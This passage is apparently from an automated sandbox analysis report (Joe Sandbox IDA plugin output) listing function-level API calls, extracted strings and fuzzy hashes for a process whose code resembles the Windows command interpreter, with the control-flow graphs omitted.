                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                                          • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                                          • API String ID: 3305344409-4288247545
                                                                                                          • Opcode ID: 5bcb5a32135a78ce5bcbb0bd87fd70d4c732013b852077ef085f129da322652b
                                                                                                          • Instruction ID: 79d77c98f87dcad91783f6f28e59adca2d96c93fe89fa48cbd7ceb25bee9b742
                                                                                                          • Opcode Fuzzy Hash: 5bcb5a32135a78ce5bcbb0bd87fd70d4c732013b852077ef085f129da322652b
                                                                                                          • Instruction Fuzzy Hash: AE42DB21A0A68285EB9AAB19F4542B9E791FF4579CFC64230DD1E477F4EF3CE1588320

                                                                                                          Control-flow Graph: control_flow_graph 216, starting at 7ff7ab12aa54 (figure and node listing not reproduced)
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                                          • String ID: :$:$:$:ON$OFF
                                                                                                          • API String ID: 972821348-467788257
                                                                                                          • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                          • Instruction ID: 751eb7f962b7d793ba3889f909c250019c7013fee953a46f920da3de5c2b07a6
                                                                                                          • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                          • Instruction Fuzzy Hash: 6F22B721A0A682C5EB5ABF2DF554279E691EF45B88FCA8135C90E473B4EF3DA444C370

                                                                                                          Control-flow Graph: control_flow_graph 398, starting at 7ff7ab1351ec (figure and node listing not reproduced)
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale$DefaultUsersetlocale
                                                                                                          • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                                          • API String ID: 1351325837-2236139042
                                                                                                          • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                          • Instruction ID: 023e1e2112c6c82e44016d12d2dc4239781cb0b8cb1a2849af190030379c36e4
                                                                                                          • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                                          • Instruction Fuzzy Hash: 42F16C31B0A74285EA56AF1DF9502B9A7A5BF04B88FD64136CA1D473B4EF3CE509C360

                                                                                                          Control-flow Graph: control_flow_graph 483, starting at 7ff7ab134224 (figure and node listing not reproduced)
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                                          • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                                          • API String ID: 388421343-2905461000
                                                                                                          • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                          • Instruction ID: 0bd5d1676b3002ff3256b252dd1c5e4af1fdf0ab2083330a296b9113d601642a
                                                                                                          • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                                          • Instruction Fuzzy Hash: C8F16332A0A78285E6A6AB19F4507B9F7A4FB49788F824135D94D43774EF3CE448CB20

                                                                                                          Control-flow Graph
                                                                                                          [Figure: control-flow graph starting at 7ff7ab135554, nodes marked Executed / Not Executed; node and edge listing omitted]
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue$CloseOpensrandtime
                                                                                                          • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                          • API String ID: 145004033-3846321370
                                                                                                          • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                          • Instruction ID: f8a97949ae12ec7b39df0bd14b60bb671d814cd3c4b1620992e8d5cfff4043b8
                                                                                                          • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                          • Instruction Fuzzy Hash: 79E1873651EA82C6E792AB18F49457AF7A0FB88748FC15135E58E03A78EF7CD548CB10

                                                                                                          Control-flow Graph
                                                                                                          [Figure: control-flow graph starting at 7ff7ab1337d8, nodes marked Executed / Not Executed; node and edge listing omitted]
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                          • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                          • API String ID: 2624720099-1920437939
                                                                                                          • Opcode ID: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                                                                                          • Instruction ID: 97f1c950924bc66f5b2d8f2f30aa24386a8ff562a316357f0ecf9ee52a76767a
                                                                                                          • Opcode Fuzzy Hash: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                                                                                          • Instruction Fuzzy Hash: 79C1E531E0A7428AF75ABB2CF4505B8FAA0FF4970CF965134D91E476B5EE3CA4488720

                                                                                                          Control-flow Graph
                                                                                                          [Figure: control-flow graph starting at 7ff7ab13823c, nodes marked Executed / Not Executed; node and edge listing omitted]
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFileFindFirstLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 873889042-0
                                                                                                          • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                          • Instruction ID: 1f9a49b581796190981ee41e3aee0d10403fa77d068c9c60447adf6263e3f43a
                                                                                                          • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                          • Instruction Fuzzy Hash: 7C515D36A0AB4686E746AF19F494179FBA1FB49B89F868131CA1E03370DF3CE554C720

                                                                                                          Control-flow Graph
                                                                                                          [Figure: control-flow graph starting at 7ff7ab132978, nodes marked Executed / Not Executed; node and edge listing omitted]
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                          • Instruction ID: 349e5c97cd19fec906a0727a699801041d374d93d39797e34afd9b9f34d35c71
                                                                                                          • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                          • Instruction Fuzzy Hash: 52512C22B0A68185EAB5BF1DF54427AE650FB447A8FC64230DE6E476F0EF3CE4498350

                                                                                                          Control-flow Graph
                                                                                                          [Figure: control-flow graph starting at 7ff7ab134d5c, nodes marked Executed / Not Executed; node and edge listing omitted]
                                                                                                          APIs
                                                                                                          • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134D9A
                                                                                                            • Part of subcall function 00007FF7AB1358E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7AB14C6DB), ref: 00007FF7AB1358EF
                                                                                                          • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134DBB
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB134DCA
                                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134DE0
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB134DEE
                                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134E04
                                                                                                            • Part of subcall function 00007FF7AB130580: _get_osfhandle.MSVCRT ref: 00007FF7AB130589
                                                                                                            • Part of subcall function 00007FF7AB130580: SetConsoleMode.KERNELBASE ref: 00007FF7AB13059E
                                                                                                            • Part of subcall function 00007FF7AB130580: _get_osfhandle.MSVCRT ref: 00007FF7AB1305AF
                                                                                                            • Part of subcall function 00007FF7AB130580: GetConsoleMode.KERNELBASE ref: 00007FF7AB1305C5
                                                                                                            • Part of subcall function 00007FF7AB130580: _get_osfhandle.MSVCRT ref: 00007FF7AB1305EF
                                                                                                            • Part of subcall function 00007FF7AB130580: GetConsoleMode.KERNELBASE ref: 00007FF7AB130605
                                                                                                            • Part of subcall function 00007FF7AB130580: _get_osfhandle.MSVCRT ref: 00007FF7AB130632
                                                                                                            • Part of subcall function 00007FF7AB130580: SetConsoleMode.KERNELBASE ref: 00007FF7AB130647
                                                                                                            • Part of subcall function 00007FF7AB134A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A28
                                                                                                            • Part of subcall function 00007FF7AB134A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A66
                                                                                                            • Part of subcall function 00007FF7AB134A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A7D
                                                                                                            • Part of subcall function 00007FF7AB134A14: memmove.MSVCRT(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A9A
                                                                                                            • Part of subcall function 00007FF7AB134A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134AA2
                                                                                                            • Part of subcall function 00007FF7AB134AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB128798), ref: 00007FF7AB134AD6
                                                                                                            • Part of subcall function 00007FF7AB134AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB128798), ref: 00007FF7AB134AEF
                                                                                                            • Part of subcall function 00007FF7AB135554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7AB134E35), ref: 00007FF7AB1355DA
                                                                                                            • Part of subcall function 00007FF7AB135554: RegQueryValueExW.KERNELBASE ref: 00007FF7AB135623
                                                                                                            • Part of subcall function 00007FF7AB135554: RegQueryValueExW.KERNELBASE ref: 00007FF7AB135667
                                                                                                            • Part of subcall function 00007FF7AB135554: RegQueryValueExW.KERNELBASE ref: 00007FF7AB1356BE
                                                                                                            • Part of subcall function 00007FF7AB135554: RegQueryValueExW.KERNELBASE ref: 00007FF7AB135702
                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134E35
                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134E81
                                                                                                          • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134F69
                                                                                                          • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134F95
                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134FB0
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134FC1
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134FD8
                                                                                                          • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134FF8
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB135037
                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB13504B
                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB1350DF
                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB1350F2
                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB13510F
                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB135130
                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB13514A
                                                                                                          • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB135175
                                                                                                            • Part of subcall function 00007FF7AB133578: _get_osfhandle.MSVCRT ref: 00007FF7AB133584
                                                                                                            • Part of subcall function 00007FF7AB133578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB13359C
                                                                                                            • Part of subcall function 00007FF7AB133578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335C3
                                                                                                            • Part of subcall function 00007FF7AB133578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335D9
                                                                                                            • Part of subcall function 00007FF7AB133578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335ED
                                                                                                            • Part of subcall function 00007FF7AB133578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB133602
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                          • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                          • API String ID: 1049357271-3021193919
                                                                                                          • Opcode ID: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                                                          • Instruction ID: 4a52ef6fa0e4acf9b8350bb3d9e3f83165947311791cc8e6d66f7248e5c593ea
                                                                                                          • Opcode Fuzzy Hash: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                                                          • Instruction Fuzzy Hash: 76C18431A0AA42C6EA4ABB1DF854179F7A0FF49B98FC65134D90E03375EF3DA4498320

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                          • String ID: :
                                                                                                          • API String ID: 1809961153-336475711
                                                                                                          • Opcode ID: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                                          • Instruction ID: 9ace4cb69f23fcbb15aaca33579ab120419c80435ad67f83b6172f3893cc77ed
                                                                                                          • Opcode Fuzzy Hash: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                                          • Instruction Fuzzy Hash: F4D1822270AB85C1EAA6EB19F4442B9F7A0FB85744F865135D94E437B4EF3CE449CB20

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                          • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                          • API String ID: 2622545777-4197029667
                                                                                                          • Opcode ID: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                                                          • Instruction ID: 65450c51038dbd328c0ca5448bcab452235d59872ec484ed5fc78df8e183612b
                                                                                                          • Opcode Fuzzy Hash: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                                                                          • Instruction Fuzzy Hash: A4919922B0A74285EE6AAB1CF8945F8A790FF48B48FC64135C54E476B5EF3CE509C760

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
